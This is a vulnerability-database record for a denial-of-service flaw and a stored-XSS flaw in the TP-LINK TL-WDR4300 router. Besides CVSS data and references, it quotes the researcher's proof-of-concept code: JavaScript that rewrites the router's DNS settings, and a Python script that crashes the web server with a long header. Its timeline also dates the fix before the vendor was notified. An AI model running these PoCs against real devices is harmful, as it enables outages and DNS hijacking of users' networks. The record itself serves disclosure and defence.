ID

VAR-201409-0078


CVE

CVE-2014-4728


TITLE

TP-LINK N750 Wireless Dual Band Gigabit Router firmware web server denial-of-service (DoS) vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2014-004486

DESCRIPTION

The web server in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to cause a denial of service (crash) via a long header in a GET request.

TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 has a denial-of-service vulnerability that allows an attacker to initiate a denial-of-service attack.

TP-LINK WDR4300 is prone to an HTML-injection vulnerability and a denial-of-service vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage these issues to cause denial-of-service conditions or execute attacker-supplied HTML or script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. TP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected.

TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China's Pulian (TP-LINK) company.

Versions Affected: 130617, possibly earlier
CVE Numbers Assigned: CVE-2014-4727, CVE-2014-4728

Vulnerabilities Description
===================
# Stored XSS - It is possible to inject JavaScript code via the DHCP hostname field. If the administrator visits the DHCP clients page (web panel), the script will execute.

Proof of Concept: ============ http://elisyan.com/tplink/wdr4300.html ---- start wdr4300.html ---- /* Author: Oz Elisyan Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check) */ var xmlhttp; if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else {// code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4 && xmlhttp.status==200) { document.getElementById("myDiv").innerHTML=xmlhttp.responseText; } } xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true); xmlhttp.send(); ---- end wdr4300.html ---- http://elisyan.com/tplink/wdr4300.py ---- start wdr4300.py ---- #Author: Oz Elisyan #TP-Link WDR4300 DoS PoC import httplib conn = httplib.HTTPConnection("192.168.0.1") headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "DoS": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}
conn.request("GET","/", "Let me tell you something", headers)
print "Done"
---- end wdr4300.py ----

Report Timeline:
===========
2014-07-04: Vendor notified about the vulnerabilities with all the relevant technical information.
2013-09-16: Vendor released a fix.

Credits:
======
The vulnerabilities were discovered by Oz Elisyan.

References:
========
http://www.tp-link.com/lk/products/details/?model=TL-WDR4300

Trust: 2.61

sources: NVD: CVE-2014-4728 // JVNDB: JVNDB-2014-004486 // CNVD: CNVD-2014-06260 // BID: 70037 // VULHUB: VHN-72669 // PACKETSTORM: 128343

IOT TAXONOMY

category: ['Network device'], sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2014-06260

AFFECTED PRODUCTS

vendor: tp link, model: tl-wdr4300, scope: lte, version: 130617

Trust: 1.0

vendor: tp link, model: tl-wdr4300, scope: eq, version: -

Trust: 1.0

vendor: tp link, model: tl-wdr4300, scope: -, version: -

Trust: 0.8

vendor: tp link, model: tl-wdr4300, scope: lt, version: 140916

Trust: 0.8

vendor: tp link, model: wdr4300 running, scope: eq, version: 130617

Trust: 0.6

vendor: tp link, model: tl-wdr4300, scope: eq, version: 130617

Trust: 0.6

sources: CNVD: CNVD-2014-06260 // JVNDB: JVNDB-2014-004486 // CNNVD: CNNVD-201409-1170 // NVD: CVE-2014-4728

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2014-4728
value: MEDIUM

Trust: 1.0

NVD: CVE-2014-4728
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2014-06260
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201409-1170
value: MEDIUM

Trust: 0.6

VULHUB: VHN-72669
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2014-4728
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:N/I:N/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2014-06260
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:N/I:N/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-72669
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:N/I:N/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CNVD: CNVD-2014-06260 // VULHUB: VHN-72669 // JVNDB: JVNDB-2014-004486 // CNNVD: CNNVD-201409-1170 // NVD: CVE-2014-4728

PROBLEMTYPE DATA

problemtype:CWE-399

Trust: 1.9

sources: VULHUB: VHN-72669 // JVNDB: JVNDB-2014-004486 // NVD: CVE-2014-4728

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201409-1170

TYPE

resource management error

Trust: 0.6

sources: CNNVD: CNNVD-201409-1170

CONFIGURATIONS

sources: JVNDB: JVNDB-2014-004486

PATCH

title: TL-WDR4300, url: http://www.tp-link.com/lk/products/details/?model=TL-WDR4300

Trust: 0.8

title: Patch for TP-LINK WDR4300 Denial of Service Vulnerability, url: https://www.cnvd.org.cn/patchInfo/show/50287

Trust: 0.6

title: TL-WDR4300_v1_140916, url: http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=56684

Trust: 0.6

sources: CNVD: CNVD-2014-06260 // JVNDB: JVNDB-2014-004486 // CNNVD: CNNVD-201409-1170

EXTERNAL IDS

db: NVD, id: CVE-2014-4728

Trust: 3.5

db: BID, id: 70037

Trust: 2.6

db: PACKETSTORM, id: 128343

Trust: 1.8

db: JVNDB, id: JVNDB-2014-004486

Trust: 0.8

db: CNVD, id: CNVD-2014-06260

Trust: 0.6

db: XF, id: 96140

Trust: 0.6

db: CNNVD, id: CNNVD-201409-1170

Trust: 0.6

db: VULHUB, id: VHN-72669

Trust: 0.1

sources: CNVD: CNVD-2014-06260 // VULHUB: VHN-72669 // BID: 70037 // JVNDB: JVNDB-2014-004486 // PACKETSTORM: 128343 // CNNVD: CNNVD-201409-1170 // NVD: CVE-2014-4728

REFERENCES

url:http://seclists.org/fulldisclosure/2014/sep/80

Trust: 2.5

url:http://www.securityfocus.com/bid/70037

Trust: 2.3

url:http://packetstormsecurity.com/files/128343/tp-link-wdr4300-xss-denial-of-service.html

Trust: 1.7

url:http://www.securityfocus.com/archive/1/533499/100/0/threaded

Trust: 1.1

url:http://www.securityfocus.com/archive/1/533501/100/0/threaded

Trust: 1.1

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/96140

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4728

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4728

Trust: 0.8

url:http://www.securityfocus.com/archive/1/archive/1/533501/100/0/threaded

Trust: 0.6

url:http://xforce.iss.net/xforce/xfdb/96140

Trust: 0.6

url:http://www.securityfocus.com/archive/1/archive/1/533499/100/0/threaded

Trust: 0.6

url:http://elisyan.com/tplink/wdr4300.py

Trust: 0.1

url:http://elisyan.com/tplink/wdr4300.html

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-4728

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-4727

Trust: 0.1

url:http://www.tp-link.com/lk/products/details/?model=tl-wdr4300

Trust: 0.1

sources: CNVD: CNVD-2014-06260 // VULHUB: VHN-72669 // JVNDB: JVNDB-2014-004486 // PACKETSTORM: 128343 // CNNVD: CNNVD-201409-1170 // NVD: CVE-2014-4728

CREDITS

Oz Elisyan

Trust: 0.4

sources: BID: 70037 // PACKETSTORM: 128343

SOURCES

db: CNVD, id: CNVD-2014-06260
db: VULHUB, id: VHN-72669
db: BID, id: 70037
db: JVNDB, id: JVNDB-2014-004486
db: PACKETSTORM, id: 128343
db: CNNVD, id: CNNVD-201409-1170
db: NVD, id: CVE-2014-4728

LAST UPDATE DATE

2025-04-13T23:31:37.606000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2014-06260, date: 2014-09-24T00:00:00
db: VULHUB, id: VHN-72669, date: 2018-10-09T00:00:00
db: BID, id: 70037, date: 2014-09-25T00:02:00
db: JVNDB, id: JVNDB-2014-004486, date: 2014-10-02T00:00:00
db: CNNVD, id: CNNVD-201409-1170, date: 2014-10-08T00:00:00
db: NVD, id: CVE-2014-4728, date: 2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2014-06260, date: 2014-09-24T00:00:00
db: VULHUB, id: VHN-72669, date: 2014-09-30T00:00:00
db: BID, id: 70037, date: 2014-09-21T00:00:00
db: JVNDB, id: JVNDB-2014-004486, date: 2014-10-02T00:00:00
db: PACKETSTORM, id: 128343, date: 2014-09-22T18:32:22
db: CNNVD, id: CNNVD-201409-1170, date: 2014-09-30T00:00:00
db: NVD, id: CVE-2014-4728, date: 2014-09-30T16:55:06.653